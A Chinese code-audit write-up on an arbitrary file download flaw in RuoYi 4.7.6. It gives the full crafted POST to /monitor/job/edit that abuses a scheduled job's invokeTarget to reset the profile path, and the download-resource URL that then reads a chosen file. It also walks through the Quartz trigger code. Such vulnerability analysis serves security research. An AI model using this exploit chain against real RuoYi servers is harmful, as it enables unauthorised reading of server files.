若依 4.7.6 版本 任意文件下载漏洞（代码审计）

1.新增定时任务2.执行定时任务3.调用下载文件接口

POST /monitor/job/edit HTTP/1.1Host: 192.168.31.28Content-Length: 235Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5630.205 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://192.168.31.28Referer: http://192.168.31.28/monitor/job/edit/1Accept-Encoding: gzip, deflateAccept-Language: zh,zh-CN;q=0.9Cookie: JSESSIONID=a650d1b5-f3db-482b-9e8b-8f94074d2828dnt: 1Connection: close
jobId=1&updateBy=admin&jobName=%E7%B3%BB%E7%BB%9F%E9%BB%98%E8%AE%A4%EF%BC%88%E6%97%A0%E5%8F%82%EF%BC%89&jobGroup=DEFAULT&invokeTarget=ruoyiConfig.setProfile('/Users/macpro/Desktop/123.txt)&cronExpression=0%2F10+*+*+*+*+%3F&misfirePolicy=3&concurrent=1&status=0&remark=

monitor/job/edit 接口

跟进StringUtils.containsAnyIgnoreCase(obj.getClass().getPackage().getName(), Constants.JOB_WHITELIST_STR)

接口 monitor/job/run

进入serviceimpl 

newTrigger()：创建一个新的触发器对象。withIdentity(newTriggerId(), Scheduler.DEFAULT_GROUP)：指定触发器的 ID 和 Group（组）。forJob(jobKey)：指定触发器要绑定的 Job（任务）。build()：创建并返回新的触发器对象。这里使用了 OperableTrigger 类型的对象来接收返回的触发器对象，该类是 Quartz 触发器的一个实现类，它可以操作和控制触发器的执行行为。jobKey 是一个 JobKey 类型的参数，代表了要关联的任务的标识和组名。综合来说，这行代码的意义是创建一个新的 Quartz 触发器对象，并将它绑定到指定的任务上，以便在需要执行该任务时触发它。
最后 通知 Quartz Scheduler 的线程，在触发器的下一次触发时间到达时运行任务。通知 Quartz Scheduler 监听器，触发器已创建

首先这里 ruoyiConfig.setProfile('/Users/macpro/Desktop/123.txt)修改的就是 配置文件中的 通过定时任务创建的触发器去执行 修改 内存中的profile值

访问 http://192.168.31.28/common/download/resource?resource=jbruoyi:.png

接口 common/download/resource